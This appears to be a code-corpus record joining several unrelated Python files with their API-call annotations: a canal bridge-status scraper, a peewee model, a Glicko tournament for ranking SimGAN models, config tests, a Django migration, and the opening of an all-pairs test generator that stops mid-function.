{}), "(\n f'cannot {opname}; the transaction is already rolled back')\n", (2167, 2232), False, 'from edgedb import errors\n'), ((2314, 2390), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is in error state"""'], {}), "(f'cannot {opname}; the transaction is in error state')\n", (2335, 2390), False, 'from edgedb import errors\n'), ((2864, 2937), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot start; the transaction is already started"""'], {}), "('cannot start; the transaction is already started')\n", (2885, 2937), False, 'from edgedb import errors\n'), ((3880, 3966), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot manually commit from within an `async with` block"""'], {}), "(\n 'cannot manually commit from within an `async with` block')\n", (3901, 3966), False, 'from edgedb import errors\n'), ((4399, 4487), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot manually rollback from within an `async with` block"""'], {}), "(\n 'cannot manually rollback from within an `async with` block')\n", (4420, 4487), False, 'from edgedb import errors\n'), ((5899, 5978), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot enter context: already in an `async with` block"""'], {}), "('cannot enter context: already in an `async with` block')\n", (5920, 5978), False, 'from edgedb import errors\n'), ((6699, 6778), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot enter context: already in an `async with` block"""'], {}), "('cannot enter context: already in an `async with` block')\n", (6720, 6778), False, 'from edgedb import errors\n'), ((8744, 8859), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""Only managed retriable transactions are supported. Use `async with transaction:`"""'], {}), "(\n 'Only managed retriable transactions are supported. 
Use `async with transaction:`'\n )\n", (8765, 8859), False, 'from edgedb import errors\n'), ((10963, 10989), 'asyncio.get_running_loop', 'asyncio.get_running_loop', ([], {}), '()\n', (10987, 10989), False, 'import asyncio\n'), ((2576, 2653), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is not yet started"""'], {}), "(f'cannot {opname}; the transaction is not yet started')\n", (2597, 2653), False, 'from edgedb import errors\n'), ((9968, 10001), 'asyncio.sleep', 'asyncio.sleep', (['self._next_backoff'], {}), '(self._next_backoff)\n', (9981, 10001), False, 'import asyncio\n'), ((10504, 10529), 'edgedb.protocol.protocol.CodecsRegistry', 'protocol.CodecsRegistry', ([], {}), '()\n', (10527, 10529), False, 'from edgedb.protocol import protocol\n'), ((10555, 10582), 'edgedb.protocol.protocol.QueryCodecsCache', 'protocol.QueryCodecsCache', ([], {}), '()\n', (10580, 10582), False, 'from edgedb.protocol import protocol\n'), ((18995, 19018), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (19015, 19018), False, 'from edgedb import con_utils\n'), ((19311, 19334), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (19331, 19334), False, 'from edgedb import con_utils\n'), ((16478, 16589), 'edgedb.errors.ClientConnectionTimeoutError', 'errors.ClientConnectionTimeoutError', (['f"""connecting to {addr} failed in {client_config.connect_timeout} sec"""'], {}), "(\n f'connecting to {addr} failed in {client_config.connect_timeout} sec')\n", (16513, 16589), False, 'from edgedb import errors\n'), ((16422, 16438), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (16436, 16438), False, 'import time\n'), ((17367, 17382), 'random.random', 'random.random', ([], {}), '()\n', (17380, 17382), False, 'import random\n'), ((18227, 18250), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (18247, 18250), False, 'from edgedb import con_utils\n'), ((16842, 16858), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (16856, 16858), False, 'import time\n'), ((18394, 18417), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (18414, 18417), False, 'from edgedb import con_utils\n'), ((18508, 18560), 'functools.partial', 'functools.partial', (['protocol_factory'], {'tls_compat': '(True)'}), '(protocol_factory, tls_compat=True)\n', (18525, 18560), False, 'import functools\n'), ((17154, 17170), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (17168, 17170), False, 'import time\n')]
|
import time
import bridge
import json
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
canal_web_source = 'http://www.greatlakes-seaway.com/R2/jsp/mNiaBrdgStatus.jsp?language=E'
welland_canal_api = 'https://wellandcanalapi.kaluba.tech'
try:
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
driver = webdriver.Chrome(chrome_options=chrome_options)
driver.implicitly_wait(5)
driver.maximize_window()
driver.get(canal_web_source)
list_elements = driver.find_element_by_css_selector('div.sections')
list_items = list_elements.find_elements_by_tag_name("li")
json_output = "[ "
for item in list_items:
split_item = item.text.replace('Bridge ', '').replace(
'Bridge Status:', '').replace('Status: ', '').replace('Next Arrival: ', '').splitlines()
bridge_id = split_item[0]
bridge_status = split_item[2]
next_arrival = split_item[3]
canal_bridge = bridge.Bridge(bridge_id, bridge_status, next_arrival)
json_output += canal_bridge.toJsonString() + " ,"
driver.quit()
json_output = json_output[:-1]
json_output += " ]"
data = {'payload': json_output}
update_status_url = welland_canal_api+'/update_bridge_status'
request = requests.post(url=update_status_url, data=data)
print(json_output)
except Exception as e:
    print('An error occurred: {}'.format(e))
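# Design note (illustrative): the manual string concatenation that builds
# json_output above could instead accumulate plain dicts and serialize them
# with the already-imported json module (json.dumps(bridges)) -- assuming
# bridge.Bridge can expose a dict form, which its unseen implementation may
# or may not provide.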
|
[
"requests.post",
"selenium.webdriver.ChromeOptions",
"bridge.Bridge",
"selenium.webdriver.Chrome"
] |
[((372, 397), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (395, 397), False, 'from selenium import webdriver\n'), ((555, 602), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'chrome_options'}), '(chrome_options=chrome_options)\n', (571, 602), False, 'from selenium import webdriver\n'), ((1494, 1541), 'requests.post', 'requests.post', ([], {'url': 'update_status_url', 'data': 'data'}), '(url=update_status_url, data=data)\n', (1507, 1541), False, 'import requests\n'), ((1184, 1237), 'bridge.Bridge', 'bridge.Bridge', (['bridge_id', 'bridge_status', 'next_arrival'], {}), '(bridge_id, bridge_status, next_arrival)\n', (1197, 1237), False, 'import bridge\n')]
|
from datetime import datetime
from peewee import ForeignKeyField, DateTimeField
from wx.app import database
from wx.models.station import Station
class Report(database.Model):
station = ForeignKeyField(Station, related_name='reports')
timestamp = DateTimeField(default=datetime.now)
class Meta:
order_by = ('-timestamp',)
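# Illustrative usage (hypothetical; assumes the tables have been created and
# a Station row exists):
#
#     station = Station.get(Station.id == 1)
#     report = Report.create(station=station)   # timestamp defaults to now
#     latest = station.reports.first()          # newest first via Meta.order_by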
|
[
"peewee.ForeignKeyField",
"peewee.DateTimeField"
] |
[((194, 242), 'peewee.ForeignKeyField', 'ForeignKeyField', (['Station'], {'related_name': '"""reports"""'}), "(Station, related_name='reports')\n", (209, 242), False, 'from peewee import ForeignKeyField, DateTimeField\n'), ((260, 295), 'peewee.DateTimeField', 'DateTimeField', ([], {'default': 'datetime.now'}), '(default=datetime.now)\n', (273, 295), False, 'from peewee import ForeignKeyField, DateTimeField\n')]
|
'''
tournament to rank refiners + discriminators for simgan
'''
import numpy as np
import pandas as pd
import torch
def get_graph_ratings(refiners,
discriminators,
validation_data,
device,
starting_rating=1500,
starting_rd=350,
norm_val=173.7178,
n_rounds=3,
matches_per_pairing=5,
samples_per_match=10,
discriminator_win_thresh=0.6):
'''
    TODO: confirm the source for this method; it appears to follow the
    skill-rating tournament evaluation of https://arxiv.org/abs/1808.04888.
Find the best refiner and discriminator from the list of refiners and discriminators using the Tournament Skill Rating Evaluation.
Parameters:
refiners (list(torch.nn)): list of refiners
discriminators (list(torch.nn)): list of discriminators
validation_data (simganData): SimGAN dataset
        device (torch.device): device on which the torch tensors are allocated
starting_rating (float): The rating that players were initialized to
starting_RD (float): The RD that players were initialized to
norm_val (float): The normalization value used to convert between phi and RD
n_rounds(int): Number of rounds for the tournament
matches_per_pairing(int): The number of matches per refiner/discriminator pairing to determine the overall winner
samples_per_match(int): The number of samples per match to determine the winner of the match
        discriminator_win_thresh (float): The average accuracy the discriminator must reach to be declared the match winner
Returns:
        A tuple of two Pandas DataFrames (refiner_ratings, discriminator_ratings),
        each with one row per refiner (respectively discriminator) holding its rating metadata.
'''
n_refiners = len(refiners)
ids = np.arange(n_refiners + len(discriminators))
refiner_ids = ids[:n_refiners]
discriminator_ids = ids[n_refiners:]
ratings = {}
for id in ids:
ratings[id] = {'r': starting_rating, 'RD': starting_rd, 'mu': 0, 'phi': starting_rd/norm_val}
labels_real = torch.zeros(samples_per_match, dtype=torch.float, device=device)
labels_refined = torch.ones(samples_per_match, dtype=torch.float, device=device)
all_real = validation_data.real_raw
all_simulated = validation_data.simulated_raw
for rnd in range(n_rounds):
# instantiate match results
match_results = {}
for id in ids:
match_results[id] = {'opponent_mus': [], 'opponent_phis': [], 'scores': []}
# Perform matches between each pair (R,D)
for id_R, R in zip(refiner_ids, refiners):
for id_D, D in zip(discriminator_ids, discriminators):
                # TODO (RODD): why multiple matches per pairing? Each match is a
                # single forward pass, so one pass over samples_per_match *
                # matches_per_pairing samples might be equivalent and cheaper.
for match in range(matches_per_pairing):
real_inds = np.random.choice(np.arange(len(all_real)), samples_per_match, replace=False)
real = torch.tensor(all_real[real_inds], dtype=torch.float, device=device)
sim_inds = np.random.choice(np.arange(len(all_simulated)), samples_per_match, replace=False)
simulated = torch.tensor(all_simulated[sim_inds], dtype=torch.float, device=device)
refined = R(simulated)
# Get discriminator accuracy on real and refined data
d_pred_real = D(real)
acc_real = calc_acc(d_pred_real, labels_real)
d_pred_refined = D(refined)
acc_refined = calc_acc(d_pred_refined, labels_refined)
# Find the average accuracy of the discriminator
avg_acc = (acc_real + acc_refined) / 2.0
# Add this match's results to match_results
match_results[id_D]['opponent_mus'].append(ratings[id_R]['mu'])
match_results[id_R]['opponent_mus'].append(ratings[id_D]['mu'])
match_results[id_D]['opponent_phis'].append(ratings[id_R]['phi'])
match_results[id_R]['opponent_phis'].append(ratings[id_D]['phi'])
if avg_acc >= discriminator_win_thresh: # An accuracy greater than or equal to this threshold is considered a win for the discriminator
# A score of 1 is a win
match_results[id_D]['scores'].append(1)
match_results[id_R]['scores'].append(0)
else:
match_results[id_D]['scores'].append(0)
match_results[id_R]['scores'].append(1)
# Update scores for the refiners and discriminators
new_ratings = ratings.copy()
for id in ids:
results = match_results[id]
glicko_calculations = calculate_new_glicko_scores(ratings[id]['mu'],
ratings[id]['phi'],
np.array(results['opponent_mus']),
np.array(results['opponent_phis']),
np.array(results['scores']),
starting_rating,
norm_val)
new_ratings[id]['mu'], new_ratings[id]['phi'], new_ratings[id]['r'], new_ratings[id]['RD'] = glicko_calculations
ratings = new_ratings
# Get refiner and discriminator with best ratings
ratings_pd = pd.DataFrame(ratings).T
refiner_ratings = ratings_pd.loc[refiner_ids]
discriminator_ratings = ratings_pd.loc[discriminator_ids]
return refiner_ratings, discriminator_ratings
def calc_acc(tensor_output, tensor_labels):
'''
Calculate the percent accuracy of the output, using the labels.
Note that the sigmoid is already calculated as part of the Discriminator Network.
Parameters:
tensor_output (torch.Tensor): M tensor output of the discriminator (M samples,) probability of being class '1'
tensor_labels (torch.Tensor): M tensor true labels for each sample
Returns:
acc (float): the probability accuracy of the output vs. the true labels
'''
    y_pred = torch.round(tensor_output)
acc = torch.sum(y_pred == tensor_labels.detach()) / len(tensor_labels.detach())
return acc
def calculate_new_glicko_scores(old_mu, old_phi, opponent_mus, opponent_phis, scores, starting_rating, norm_val):
'''
    Glicko-2 references (the probable sources for this implementation):
    http://www.glicko.net/glicko/glicko2.pdf
    https://en.wikipedia.org/wiki/Glicko_rating_system
Calculate and return the new glicko values for the player using Glicko2 calculation
Parameters:
old_mu (float): The former mu rating
old_phi (float): The former phi rating
opponent_mus (list(float)): The mu ratings of the opponents played
opponent_phis (list(float)): The phi ratings of the opponents played
scores (list(inte)): The scores of the games played, 1 indicating a win, 0 indicating a loss
starting_rating (float): The rating that players were initialized to
norm_val (float): The normalization value used to convert between phi and RD
Returns:
(new_mu, new_phi, new_rating, new_rd) (float, float, float, float): The updated Glicko values for the player
'''
    g = 1.0 / (1 + 3 * opponent_phis**2 / np.pi**2) ** 0.5 # Glicko-2 g(phi): down-weights games against opponents whose own ratings are uncertain (large phi)
E = 1.0 / (1 + np.exp(-1 * g * (old_mu - opponent_mus))) # Probability of player winning each match
v = np.sum(g**2 * E * (1 - E)) ** -1 # Estimated variance of the player's rating based on game outcomes
delta = v * np.sum(g * (scores - E)) # Estimated improvement in rating
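    # Rating-deviation update; unlike full Glicko-2, the volatility (sigma)
    # inflation step is omitted here, so phi can only shrink between rounds.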
new_phi = 1 / (1/old_phi**2 + 1/v) ** 0.5
new_mu = old_mu + new_phi**2 * np.sum(g * (scores - E))
new_rating = norm_val * new_mu + starting_rating
new_rd = norm_val * new_phi
return new_mu, new_phi, new_rating, new_rd
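# Minimal usage sketch (not part of the original module; all argument values
# below are illustrative assumptions): one win and one loss against two
# average-rated opponents, using Glicko's conventional scale constants.
if __name__ == "__main__":
    demo = calculate_new_glicko_scores(
        old_mu=0.0,
        old_phi=350.0 / 173.7178,  # a fresh player's RD of 350 on the mu/phi scale
        opponent_mus=np.array([0.0, 0.0]),
        opponent_phis=np.array([350.0 / 173.7178, 350.0 / 173.7178]),
        scores=np.array([1, 0]),  # one win, one loss
        starting_rating=1500.0,
        norm_val=173.7178,
    )
    print(demo)  # -> (new_mu, new_phi, new_rating, new_rd)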
|
[
"pandas.DataFrame",
"torch.ones",
"numpy.sum",
"numpy.array",
"numpy.exp",
"torch.zeros",
"torch.round",
"torch.tensor"
] |
[((2232, 2296), 'torch.zeros', 'torch.zeros', (['samples_per_match'], {'dtype': 'torch.float', 'device': 'device'}), '(samples_per_match, dtype=torch.float, device=device)\n', (2243, 2296), False, 'import torch\n'), ((2318, 2381), 'torch.ones', 'torch.ones', (['samples_per_match'], {'dtype': 'torch.float', 'device': 'device'}), '(samples_per_match, dtype=torch.float, device=device)\n', (2328, 2381), False, 'import torch\n'), ((6683, 6709), 'torch.round', 'torch.round', (['tensor_output'], {}), '(tensor_output)\n', (6694, 6709), False, 'import torch\n'), ((5944, 5965), 'pandas.DataFrame', 'pd.DataFrame', (['ratings'], {}), '(ratings)\n', (5956, 5965), True, 'import pandas as pd\n'), ((8078, 8106), 'numpy.sum', 'np.sum', (['(g ** 2 * E * (1 - E))'], {}), '(g ** 2 * E * (1 - E))\n', (8084, 8106), True, 'import numpy as np\n'), ((8194, 8218), 'numpy.sum', 'np.sum', (['(g * (scores - E))'], {}), '(g * (scores - E))\n', (8200, 8218), True, 'import numpy as np\n'), ((7985, 8025), 'numpy.exp', 'np.exp', (['(-1 * g * (old_mu - opponent_mus))'], {}), '(-1 * g * (old_mu - opponent_mus))\n', (7991, 8025), True, 'import numpy as np\n'), ((8334, 8358), 'numpy.sum', 'np.sum', (['(g * (scores - E))'], {}), '(g * (scores - E))\n', (8340, 8358), True, 'import numpy as np\n'), ((5342, 5375), 'numpy.array', 'np.array', (["results['opponent_mus']"], {}), "(results['opponent_mus'])\n", (5350, 5375), True, 'import numpy as np\n'), ((5439, 5473), 'numpy.array', 'np.array', (["results['opponent_phis']"], {}), "(results['opponent_phis'])\n", (5447, 5473), True, 'import numpy as np\n'), ((5537, 5564), 'numpy.array', 'np.array', (["results['scores']"], {}), "(results['scores'])\n", (5545, 5564), True, 'import numpy as np\n'), ((3300, 3367), 'torch.tensor', 'torch.tensor', (['all_real[real_inds]'], {'dtype': 'torch.float', 'device': 'device'}), '(all_real[real_inds], dtype=torch.float, device=device)\n', (3312, 3367), False, 'import torch\n'), ((3513, 3584), 'torch.tensor', 'torch.tensor', (['all_simulated[sim_inds]'], {'dtype': 'torch.float', 'device': 'device'}), '(all_simulated[sim_inds], dtype=torch.float, device=device)\n', (3525, 3584), False, 'import torch\n')]
|
import pytest
def test_config_exists():
from infrastructure.config import config
assert 'demo' in config['environment']
def test_config_common_dataclass():
from infrastructure.config import Common
common = Common()
assert common.organization_name == 'igvf-dacc'
assert common.project_name == 'igvfd'
def test_config_config_dataclass():
from infrastructure.config import Config
config = Config(
name='demo',
branch='xyz-branch',
pipeline='xyz-pipeline',
)
assert config.common.organization_name == 'igvf-dacc'
assert config.common.project_name == 'igvfd'
assert config.snapshot_source_db_identifier is None
assert config.branch == 'xyz-branch'
assert config.pipeline == 'xyz-pipeline'
def test_config_build_config_from_name():
from infrastructure.config import build_config_from_name
from infrastructure.constants import DEV_DATABASE_IDENTIFIER
config = build_config_from_name(
'demo',
branch='my-branch',
pipeline='my-pipeline',
)
assert config.common.organization_name == 'igvf-dacc'
assert config.common.project_name == 'igvfd'
assert config.snapshot_source_db_identifier == DEV_DATABASE_IDENTIFIER
assert config.branch == 'my-branch'
assert config.pipeline == 'my-pipeline'
assert config.name == 'demo'
config = build_config_from_name(
'demo',
branch='my-branch',
# Overrides.
pipeline='my-pipeline',
)
config = build_config_from_name(
'dev',
branch='my-branch',
)
assert config.common.organization_name == 'igvf-dacc'
assert config.common.project_name == 'igvfd'
assert config.snapshot_source_db_identifier is None
assert config.branch == 'my-branch'
assert config.pipeline == 'ContinuousDeploymentPipelineStack'
assert config.name == 'dev'
def test_config_build_config_from_branch():
from infrastructure.config import get_config_name_from_branch
config_name = get_config_name_from_branch('IGVF-123-add-new-feature')
assert config_name == 'demo'
config_name = get_config_name_from_branch('dev')
assert config_name == 'dev'
|
[
"infrastructure.config.get_config_name_from_branch",
"infrastructure.config.build_config_from_name",
"infrastructure.config.Common",
"infrastructure.config.Config"
] |
[((226, 234), 'infrastructure.config.Common', 'Common', ([], {}), '()\n', (232, 234), False, 'from infrastructure.config import Common\n'), ((424, 489), 'infrastructure.config.Config', 'Config', ([], {'name': '"""demo"""', 'branch': '"""xyz-branch"""', 'pipeline': '"""xyz-pipeline"""'}), "(name='demo', branch='xyz-branch', pipeline='xyz-pipeline')\n", (430, 489), False, 'from infrastructure.config import Config\n'), ((953, 1027), 'infrastructure.config.build_config_from_name', 'build_config_from_name', (['"""demo"""'], {'branch': '"""my-branch"""', 'pipeline': '"""my-pipeline"""'}), "('demo', branch='my-branch', pipeline='my-pipeline')\n", (975, 1027), False, 'from infrastructure.config import build_config_from_name\n'), ((1371, 1445), 'infrastructure.config.build_config_from_name', 'build_config_from_name', (['"""demo"""'], {'branch': '"""my-branch"""', 'pipeline': '"""my-pipeline"""'}), "('demo', branch='my-branch', pipeline='my-pipeline')\n", (1393, 1445), False, 'from infrastructure.config import build_config_from_name\n'), ((1511, 1560), 'infrastructure.config.build_config_from_name', 'build_config_from_name', (['"""dev"""'], {'branch': '"""my-branch"""'}), "('dev', branch='my-branch')\n", (1533, 1560), False, 'from infrastructure.config import build_config_from_name\n'), ((2015, 2070), 'infrastructure.config.get_config_name_from_branch', 'get_config_name_from_branch', (['"""IGVF-123-add-new-feature"""'], {}), "('IGVF-123-add-new-feature')\n", (2042, 2070), False, 'from infrastructure.config import get_config_name_from_branch\n'), ((2122, 2156), 'infrastructure.config.get_config_name_from_branch', 'get_config_name_from_branch', (['"""dev"""'], {}), "('dev')\n", (2149, 2156), False, 'from infrastructure.config import get_config_name_from_branch\n')]
|
from .cube import *
from .cube_animations import *
try:
import importlib.metadata as importlib_metadata
except ModuleNotFoundError:
import importlib_metadata
__version__ = importlib_metadata.version(__name__)
|
[
"importlib_metadata.version"
] |
[((182, 218), 'importlib_metadata.version', 'importlib_metadata.version', (['__name__'], {}), '(__name__)\n', (208, 218), False, 'import importlib_metadata\n')]
|
# Generated by Django 3.2 on 2022-01-20 21:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("auth", "0012_alter_user_first_name_max_length"),
("auth_app", "0002_businessowner_is_superuser"),
]
operations = [
migrations.AddField(
model_name="businessowner",
name="groups",
field=models.ManyToManyField(
blank=True,
help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
related_name="user_set",
related_query_name="user",
to="auth.Group",
verbose_name="groups",
),
),
migrations.AddField(
model_name="businessowner",
name="user_permissions",
field=models.ManyToManyField(
blank=True,
help_text="Specific permissions for this user.",
related_name="user_set",
related_query_name="user",
to="auth.Permission",
verbose_name="user permissions",
),
),
]
|
[
"django.db.models.ManyToManyField"
] |
[((407, 658), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'help_text': '"""The groups this user belongs to. A user will get all permissions granted to each of their groups."""', 'related_name': '"""user_set"""', 'related_query_name': '"""user"""', 'to': '"""auth.Group"""', 'verbose_name': '"""groups"""'}), "(blank=True, help_text=\n 'The groups this user belongs to. A user will get all permissions granted to each of their groups.'\n , related_name='user_set', related_query_name='user', to='auth.Group',\n verbose_name='groups')\n", (429, 658), False, 'from django.db import migrations, models\n'), ((892, 1096), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'help_text': '"""Specific permissions for this user."""', 'related_name': '"""user_set"""', 'related_query_name': '"""user"""', 'to': '"""auth.Permission"""', 'verbose_name': '"""user permissions"""'}), "(blank=True, help_text=\n 'Specific permissions for this user.', related_name='user_set',\n related_query_name='user', to='auth.Permission', verbose_name=\n 'user permissions')\n", (914, 1096), False, 'from django.db import migrations, models\n')]
|
import csv
import yaml
from dixday_predictions import __version__
from dixday_predictions.eventhandler.EventHandler import EventHandler
def _read_config(config_path) -> dict:
with open(config_path, "r") as ymlfile:
config = yaml.safe_load(ymlfile)
return config
def test_version():
assert __version__ == '0.1.5'
|
[
"yaml.safe_load"
] |
[((239, 262), 'yaml.safe_load', 'yaml.safe_load', (['ymlfile'], {}), '(ymlfile)\n', (253, 262), False, 'import yaml\n')]
|
# Generate an all-pairs covering test suite
#
# (c) 2007 University of Oregon and <NAME>
# All rights reserved.
#
License = """
(C) 2007,2017 University of Oregon and <NAME>. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the
distribution.
* Neither the name of the University of Oregon nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
This software is provided by the copyright holders and contributors
"as is" and any express or implied warranties, including, but not
limited to, the implied warranties of merchantability and fitness for
a particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
"""
usage = """Usage:
# To read a specification (foo.cp) and print the test vector in human-readable
# format:
python genpairs.py < foo.cp
# To read a partial suite of test cases (tests.txt) in CSV format,
# plus a test specification, and report which pairs of values have not
# been covered:
python genpairs.py --csv --initial-suite tests.txt -o -v -p < foo.cp
# To read the same as above, and then produce a test suite that
# covers the missing pairs:
python genpairs.py --csv --initial-suite tests.txt < foo.cp
"""
#
# An item is a pair (slot number, value)
# An itempair is a pair (item, item), that is, ((slot, value), (slot, value))
# An obligation is a pair (the two items must occur together in some case)
# An exclusion is a pair (the two items must not occur together in any case)
# A case is a list (array) with n columns
#
# Representations:
# A test case is represented as a list, indexed by column (category)
# A test suite is a list of test cases
# An item is a tuple, and an itempair is a tuple
#
# Like AETG and several other covering array generators, the outer
# loop will generate test cases, and the inner loops try to fulfill
# as many test obligations as possible with each test case.
#
# Data structures:
# We will record obligations in three different data structures,
# for different forms of quick access:
# ObsList is a list of obligations, some of which may
# already have been fulfilled (deletion is lazy). We may scramble
# this list so we don't have an unfortunate ordering.
# Outstanding is a set of all the obligations still outstanding.
# ObsByCol is a dictionary obligations by column, also updated lazily.
#
# Exclude is a dictionary mapping items to lists of item.
#
import sys ## for file handling
import random ## for shuffling lists
import csv ## for reading and writing test suites
## Constants (other than tokens for parsing)
DontCare = "_"
## Configuration parameters
DBG = False ## Debugging mode, on (true) or off (false)
DBGp = False ## Performance debugging, December 2006
maxCandidates = 50 ## Bigger = better solutions, smaller = faster
## Platform compatibility
# ----------------------------------------
import six # Python 2 and 3 compatibility
from six import print_
## Logging
#
import logging
logging.basicConfig(format='%(levelname)s:%(message)s',
level=logging.WARNING)
Log = logging.getLogger(__name__)
# Debug messages
def dbg(*msg):
parts = [ str(x) for x in msg ]
msg_string = " ".join(parts)
Log.debug(msg_string)
# Performance debug messages
def dbg_p(*msg):
if DBGp:
dbg(*msg)
# ------------------------------------
## User arguments
from optparse import OptionParser
optparser = OptionParser(usage=usage)
optparser.set_defaults(output_format="plain")
optparser.add_option("-d", "--debug",
help="Print a lot of debugging messages",
action="store_true", default=False, dest="debug")
optparser.add_option("-l", "--license",
help="Print license terms (and then quit)",
action="store_true",default=False, dest="license")
optparser.add_option("--csv", "-c", "--comma-separated-values",
action="store_const", dest="output_format",
const = "csv",
help = """Output format is comma-separated-values
(suitable as input to Excel and other spreadsheets,
genpairs with the -i option, and some other
programs).""")
optparser.add_option("-v", "--varying", "--varying-columns-only",
action="store_true", default=False, dest="varying",
help="""Include only categories with more than one
non-error and non-single value""")
optparser.add_option("-s", "--singles", "--singles-only",
action="store_false", default=True, dest="combinations",
help="""Print only test cases covering 'error'
and 'single' values.""")
optparser.add_option("-o", "--omit-singles",
action="store_false", default=True, dest="singles",
help = """Do not produce test cases covering 'single'
or 'error' values.""")
optparser.add_option("-i", "--initial", "--initial-suite",
action="append", default = [], dest="initial_suite",
help="""Read initial test suite (in csv format). Often
used together with -p""")
optparser.add_option("-p", "--pairs", "--print-pairs",
action="store_true", default=False, dest="pairs",
help="""Report pairs not covered by initial test suites.
(Useful only with --initial)""")
(UserOptions, UserArgs) = optparser.parse_args()
Log.info("User options: ", UserOptions)
if UserOptions.debug :
print_("Enabling debugging")
DBG=True
Log.setLevel(logging.DEBUG)
## Primary data structures
CategoriesList = [ ] ## List of category names (in order given)
## The CategoriesList can also be considered the test case schema
CategoriesValues = [ ] ## List of value sets
Singles = [] ## List of (slot,value,kind) where kind is "single" or "error"
Excludes = set() ## Set of ((slot,value),(slot,value)) (not symmetric)
ObsList = [ ] # All obligations, but only one direction
Outstanding = set() # All obligations, but only one direction
ObsByCol = {} # Per column, both directions
SingleColumns = [ ] # Columns with just one (non-error, non-single) choice
MultipleColumns = [ ] # Complement of SingleColumns -- pairs are from these
NCol = 0 # ==len(CategoriesList), set after parsing
## Temporary, for building excludes
PropsSlots = { } # For each property name, set of slots with it
CategoriesProps = { } # For each category, all props on any values
ValueProps = { } # Map (slot,value) pair to list of condition names
ValueIfs = [ ] # List of (value, slot, condition) triples
ValueExcepts = [ ] # List of (value, slot, condition) triples
## What we build
Suite = [ ] ## List of test cases
## Instrumentation
INSTR_N_Comparisons = 0
# ---------- Read spec file using a simple LL parser ----
# Consts for token classification
EOF = "<EOF>"
CategoryToken = "<CAT>"
ValueToken = "<VAL>"
IfToken = "<IF>"
PropToken = "<PROP>"
ExceptToken = "<EXCEPT>"
ErrorToken = "<ERROR>"
SingleToken = "<SINGLE>"
EOFToken = EOF
def tokenClass( tok ) :
if tok == EOF : return EOFToken
if tok.endswith(":") : return CategoryToken
if tok == "if" : return IfToken
if tok == "prop" : return PropToken
if tok == "except" : return ExceptToken
if tok == "single" : return SingleToken
if tok == "error" : return ErrorToken
return ValueToken
# Generator to produce tokens, one by one
#
def getToken() :
while 1:
s = sys.stdin.readline()
if not s:
dbg("#DBG <<EOF reached>>")
yield EOF
return
commentPos = s.find("//");
if commentPos >= 0 :
s = s[0:commentPos]
for word in s.split() :
dbg("#DBG <<%s: %s>>" % ( word, tokenClass(word) ) )
yield word
Token = "<PASSWORD>"
tokenStream = getToken()
def parse():
global Token
global NCol
Token = six.next(tokenStream)
parseSpec()
NCol = len(CategoriesList)
def parseSpec():
global Token
dbg("#DBG (parseSpec)")
if Token == EOF : return [ ]
if tokenClass( Token ) != CategoryToken :
print_("Syntax error on ", Token, " looking for 'category:'")
print_("Skipping to next category")
## Error recovery to next category
while tokenClass( Token ) != CategoryToken :
if tokenClass( Token ) == EOF :
print_("Discarding rest of file")
return [ ]
            Token = six.next(tokenStream)
print_("Resuming from" , Token)
category = Token[0:-1]
Token = six.next(tokenStream)
values = parseValues()
dbg("#DBG Parsed: ", category, " ::= ", values)
slotNum = len(CategoriesList)
CategoriesList.append( category )
vlist = [ ]
CategoriesValues.append(vlist)
CategoriesProps[ category ] = [ ]
for valDesc in values :
val = valDesc[0] ## The name of the value itself
## Postpone marking val as a possible value of the property
## until we know whether it is a singleton
singleton = False
ValueProps[ (slotNum, val) ] = [] ## List of its properties
for cond in valDesc[1:] :
kind = nameOf(cond)
condVal = valOf(cond)
if kind == "prop" :
CategoriesProps[ category ].append(condVal)
ValueProps[ (slotNum, val ) ].append(condVal)
if condVal not in PropsSlots :
PropsSlots[condVal] = set()
PropsSlots[condVal].add(slotNum)
elif kind == "if" :
ValueIfs.append( (val, slotNum, condVal ) )
elif kind == "except" :
ValueExcepts.append( (val, slotNum, condVal) )
elif kind == "error" or kind == "single" :
Singles.append( (val, slotNum, kind) )
singleton = True
else :
print_("*ERR* Unrecognized condition attribute:", cond)
if not singleton: vlist.append( val )
parseSpec()
def parseValues():
global Token
dbg("#DBG (parseValues)")
values = [ ]
while tokenClass( Token ) == ValueToken :
val = parseValue()
dbg("#DBG (parsed value: ", val, ")")
values.append( val )
return values
def parseValue():
global Token
